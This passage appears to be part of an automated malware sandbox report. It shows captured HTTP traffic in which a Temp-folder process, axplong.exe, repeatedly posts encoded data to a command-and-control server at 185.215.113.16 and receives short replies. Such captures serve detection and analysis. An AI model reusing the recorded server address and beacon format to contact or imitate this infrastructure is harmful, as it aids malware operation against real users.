                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:27.351777077 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:27.582896948 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.453675185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:27.693331957 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:28.416405916 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:28.417171001 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:28.646837950 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.453676185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:28.756463051 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:29.463371038 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:29.465898991 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:29.880362034 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.453677185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:29.992090940 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:30.702501059 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:30.703308105 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:30.931937933 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.453678185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:31.052244902 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:31.762780905 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:31.763566971 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:31.990339041 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.453679185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:32.099963903 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:32.820094109 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:32.821197987 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:33.152426958 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.453680185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:33.271615982 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:33.961616039 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:33.967190981 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:34.189575911 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.453681185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:34.305217981 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:34.992479086 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:34.994246960 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:35.216281891 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.453682185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:35.334467888 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:36.028846025 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:36.032551050 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:36.262620926 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.453683185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:36.381267071 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:37.079862118 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:37.081641912 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:37.309089899 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.453684185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:37.428280115 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:38.118551016 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:38.125179052 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:38.346129894 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.453685185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:38.461518049 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:39.167851925 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:39.169132948 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:39.684541941 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Sep 27, 2024 08:41:39.684638023 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.453686185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:39.803195953 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
